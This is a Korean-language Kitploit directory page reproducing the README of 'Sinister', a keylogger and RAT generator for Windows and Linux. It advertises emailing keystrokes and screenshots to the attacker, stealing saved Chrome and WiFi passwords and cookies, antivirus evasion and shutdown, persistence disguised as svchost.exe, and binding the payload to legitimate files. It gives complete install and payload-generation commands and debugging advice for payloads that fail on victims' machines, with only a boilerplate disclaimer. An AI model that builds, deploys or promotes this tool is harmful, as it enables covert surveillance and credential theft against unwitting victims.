Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Sinister — Sinister는 Windows/Linux 키로거 생성기로서, 키 로그를 이메일로 전송하고 기타 유용한 대상 정보도 함께 보냅니다. | Kitploit
도구/GitHubGitHub/pushpenderindia/sinister
Password CrackingPayload GenerationPersistence MechanismsData ExfiltrationInformation GatheringPost-ExploitationRed TeamingRemote Access Tool
GitHubpushpenderindia/sinister

Sinister

Sinister는 Windows/Linux 키로거 생성기로서, 키 로그를 이메일로 전송하고 기타 유용한 대상 정보도 함께 보냅니다.

저장소 보기
465931년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Sinister Logo

Sinister

Hacker GIF

root@kitploit:~
                    이 작은 파이썬 스크립트는 정말 멋진 작업을 할 수 있습니다.

Sinister는 Windows/Linux용 키로거 생성기(keylogger generator)로, 키로그 및 스크린샷을 이메일로 전송하며, 대상의 기타 유용한 정보를 함께 보냅니다. Python 3으로 작성되었습니다.

면책 조항

:computer: 이 프로젝트는 오직 좋은 목적과 개인적인 용도로만 제작되었습니다.

이 소프트웨어는 어떠한 종류의 보증도 없이 "있는 그대로" 제공됩니다. 귀하는 이 소프트웨어를 자신의 책임 하에 사용할 수 있습니다. 사용에 대한 모든 책임은 최종 사용자에게 있습니다. 개발자는 어떠한 책임도 지지 않으며, 이 프로그램으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.

기능

  • Windows/Linux에서 작동
  • 새로운 피해자 이메일로 알림 전송
  • 탐지 불가능
  • 지속성(Persistence)
  • 페이로드 생성 전 이메일 자격 증명 확인
  • GMAIL, YAHOO, OUTLOOK, 사용자 지정 SMTP 등 모든 이메일 공급자에서 키로그 수신 가능
  • SMTP 서버/포트
서버 이름SMTP 서버SMTP 포트
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • 피해자 PC 화면의 스크린샷을 이메일로 전송
  • 의존성 없이 실행 가능한 바이너리 생성
  • 약 5MB 크기의 고급 기능을 갖춘 페이로드 생성
  • 페이로드를 생성하기 전에 난독화하여 일부 안티바이러스를 우회
  • 생성된 페이로드는 base64로 인코딩되어 리버스 엔지니어링이 매우 어려움
  • 피해자 PC의 안티바이러스를 종료하고 보안을 비활성화하는 기능
  • 페이로드 생성을 위한 멋진 컬러 인터페이스
  • 공격자 측: 페이로드 생성 시 누락된 종속성을 자동으로 감지하여 설치
  • 활성 창 이름을 기준으로 로그 데이터 구분 (이해를 돕기 위해 이미지 확인)
  • 악성 파일에 사용자 정의 아이콘 추가 가능
  • 내장 바인더로 키로거를 모든 파일[.pdf, .txt, .exe 등]에 바인딩하여, 전면에서 정상 파일을 실행하고 백그라운드에서 서비스로 악성 코드 실행
  • 시스템에서 이미 실행 중인 인스턴스 확인. 실행 중인 인스턴스가 있으면 정상 파일만 실행 [중복 이메일 로그 수신 방지를 위한 다중 인스턴스 금지]
  • 공격자는 Linux 시스템을 사용하여 Windows/Linux OS용 페이로드 생성/컴파일 가능, Windows 머신에서는 Windows 실행 파일만 생성/컴파일 가능
  • 피해자 시스템에서 저장된 비밀번호를 검색하여 공격자에게 전송
내장 스틸러가 훔칠 수 있는 항목 :
Chrome 브라우저 (저장된 비밀번호)
WiFi (저장된 비밀번호)
Chrome 쿠키 (로그인 데이터, 쿠키, 방문 기록)
Firefox 쿠키 (cookies.sqlite)

참고: 사용자 정의 스틸러가 코딩되었으며, LaZagne에 의존하지 않음

  • 피해자 장치의 유용한 정보를 수집하여 전송
수집 및 전송 항목:
운영체제
컴퓨터 이름
사용자 이름
공인 IPv4
  • 페이로드가 실행되지 않는 경우, --debug를 지정하여 CMD와 함께 포그라운드에서 exe 실행

중요

2022년 5월 30일부터 Google이 덜 안전한 앱 기능을 제거했습니다. 따라서 Gmail 비밀번호 대신:

  • 공격자 Gmail에 2단계 인증(2FA) 활성화
  • 앱 특정 비밀번호(App Specific Password) 생성
  • 페이로드 생성 시 해당 앱 특정 비밀번호 사용
  • 앱 특정 비밀번호 생성 방법: 여기 클릭

테스트 환경

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

사전 요구 사항

  • Python 3.X
  • 몇 가지 외부 모듈

Linux에서 사용하는 방법

root@kitploit:~
# /opt 디렉토리로 이동 (선택 사항)
$ cd /opt/

# 이 저장소 복제
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Sinister 폴더로 이동
$ cd Sinister

# 의존성 설치
$ bash installer_linux.sh

*** 참고: installer_linux.sh 실행 중 Python 설치 대화상자가 나타날 때 ***
    * 사용자 지정 설치(Custom install) 클릭
    * 경로를 C:/Python37-32 로 선택
    ### Python이 이 경로(Wine 내부)에 설치됨: ~/.wine/drive_c/Python37-32

# installer_linux.sh 실행 중 오류가 발생하면, installer_linux.py를 사용하여 설치 시도
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# 페이로드/RAT 생성
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# GMAIL SMTP 서버, 포트 구성을 사용한 페이로드 생성 (기본 SMTP 서버 = smtp.gmail.com, 기본 SMTP 포트 = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# OUTLOOK SMTP 서버, 포트 구성을 사용한 페이로드 생성
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# YAHOO SMTP 서버, 포트 구성을 사용한 페이로드 생성
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

참고: icon 폴더에서 사용자 정의 아이콘을 사용할 수도 있습니다. 다음과 같이 사용하세요: --icon icon/pdf.ico

Windows에서 사용하는 방법

root@kitploit:~
# 의존성 설치
$ 최신 python 3.x 설치

# 이 저장소 복제
$ git clone https://github.com/PushpenderIndia/Sinister.git

# 저장소로 이동
$ cd Sinister

# 의존성 설치
$ python -m pip install -r requirements.txt

# 텍스트 편집기에서 Sinister.py를 열고 16번째 줄 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 를 구성합니다.

# 도움말 메뉴 보기
$ python Sinister.py --help

# 페이로드/RAT 생성
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# GMAIL SMTP 서버, 포트 구성을 사용한 페이로드 생성 (기본 SMTP 서버 = smtp.gmail.com, 기본 SMTP 포트 = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# OUTLOOK SMTP 서버, 포트 구성을 사용한 페이로드 생성
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# YAHOO SMTP 서버, 포트 구성을 사용한 페이로드 생성
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

참고: icon 폴더에서 사용자 정의 아이콘을 사용할 수도 있습니다. 다음과 같이 사용하세요: --icon icon/pdf.ico

업데이트 방법

  • updater.py를 실행하여 자동 업데이트하거나 이 GitHub 저장소에서 최신 Zip 파일을 다운로드하세요.
  • 참고: updater.py를 사용하려면 Git이 설치되어 있어야 합니다.

참고:- 악성 파일은 Sinister/ 폴더 내의 dist/ 폴더에 저장됩니다.

사용 가능한 인수

  • 선택적 인수

참고: -w/--windows 또는 -l/--linux 중 하나를 반드시 지정해야 함

  • 필수 인수

새 스크린샷:

도움말 보기

페이로드 생성

보고서 받기

활성 창 이름을 기준으로 로그 데이터 구분 ~ v1.3 이상에 추가된 기능

저장된 Chrome 브라우저 비밀번호 검색 및 전송

  • 참고: 이 기능을 사용하려면 키로거 생성 시 -s 또는 --steal-password를 지정하세요

저장된 WiFi 비밀번호 검색 및 전송

  • 참고: 이 기능을 사용하려면 키로거 생성 시 -s 또는 --steal-password를 지정하세요

이전 이미지도 참조하세요

~이전 스크린샷:

도움말 보기

Sinister.py 스크립트 실행

빌드 완료

키로거 실행 시 지속성을 위해 레지스트리 추가

자신의 복사본을 만들어 Roaming 폴더에 저장

키로거 테스트를 위한 무작위 텍스트 입력

Sinister가 보낸 보고서 1

Facebook 로그인 ~ 피해자

보고서 2 - Facebook 자격 증명의 키로그

보고서 3 - 스크린샷 포함

디버그 문제

**오프라인 키로거(Offline Keylogger)**를 실행하여 오프라인 키 로그 캡처를 테스트하고 다음 명령을 실행하여 키로거 문제를 디버그하세요:

test_key.py를 [컴파일된 모드 및 원시 모드] 두 가지 모드로 실행하고 오류를 확인하세요

다음과 같이 실행: python test_key.py

또한 다음과 같이 컴파일: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

실행 후, 무언가 입력을 시작하세요. 10초마다 결과가 명령 프롬프트에 표시됩니다.

오프라인 키로거 파일은 TestKeylogger 폴더에 있습니다

  • 피해자 시스템에서 페이로드가 실행되지 않는 경우
root@kitploit:~
1. --debug 플래그로 새 페이로드 생성
2. cmd를 통해 페이로드 exe 실행 [더블 클릭으로 페이로드 실행 금지]
3. 이제 CMD에서 더 자세한 오류가 표시됩니다. 해당 문제를 Issue 섹션에 올려주세요

Windows에서 Sinister 제거:

방법 1:

  • 시작 버튼으로 이동하여 regedit를 입력하고 첫 번째 프로그램을 실행하면 레지스트리 편집기가 열립니다.
  • 다음 경로로 이동: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 여기에 svchost라는 항목이 있습니다. 이 항목을 마우스 오른쪽 버튼으로 클릭하고 삭제를 선택합니다.
  • 사용자 경로 > AppData > Roaming으로 이동하면 "svchost.exe"라는 파일이 보입니다. 이것이 RAT입니다. 마우스 오른쪽 버튼 클릭 > 삭제.
  • 시스템을 다시 시작합니다.

방법 2:

  • 감염된 시스템에서 "RemoveSinister.bat"를 실행한 다음 PC를 다시 시작하여 현재 실행 중인 악성 파일을 중지합니다.

Linux에서 Sinister 제거:

  • 텍스트 편집기로 Autostart 파일을 엽니다. Autostart 파일 경로: ~/.config/autostart/xinput.desktop

  • 다음 5줄을 제거합니다:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • 참고: destination_file_name은 -o 매개변수로 키로거에 지정한 악성 파일의 이름입니다.

  • 시스템을 재부팅한 후 다음 경로에 저장된 악성 파일을 삭제합니다.

  • 키로거가 저장된 대상 경로: ~/.config/xnput

기여자

  • 기여자 목록: Contributors

모든 종류의 기여를 환영합니다!

참고: 목록에 있어야 하는데 누락된 경우 알려주세요!

TODO

  • 자신만의 기능 제안
  • 새로운 기능 추가
  • GUI 버전 기여
도구 다운로드
약어전체 이름설명
-h--help이 도움말 메시지를 표시하고 종료
-i INTERVAL--interval INTERVAL보고서 간 시간(초). 기본값=120
-t TIME_PERSISTENT--persistence TIME_PERSISTENT__초 후에 지속성 활성화. 기본값=10
-x SMTP_Server--smtp사용자 정의 SMTP 서버. 기본값="smtp.gmail.com"
-y SMTP_Port--port사용자 정의 SMTP 포트. 기본값=587
-w--windowsWindows 실행 파일 생성
-l--linuxLinux 실행 파일 생성
-s--steal-password피해자 시스템에서 저장된 비밀번호 탈취 [지원 OS: Windows]
-b file.txt--bind LEGITIMATE_FILE_PATH.pdf자동 바인더: 정상 파일의 경로 지정 [지원 OS: Windows]
-d--debug페이로드가 CMD 창과 함께 포그라운드에서 실행되어 적절한 실행 오류 확인
약어전체 이름설명
--icon ICON아이콘 경로 지정, 악성 파일의 아이콘 [참고: 반드시 .ico 형식]
-e EMAIL--email EMAIL보고서를 보낼 이메일 주소
-p PASSWORD--password PASSWORD-e 인수에 지정된 이메일 주소의 비밀번호
-o OUT--out OUT출력 파일 이름

Pushpender Singh

:computer:

Thomas Kunwar

:computer:

krasnova19

:computer:

sarchish5

:computer:

chiragcode11

:computer:

C4RR0T02

:computer: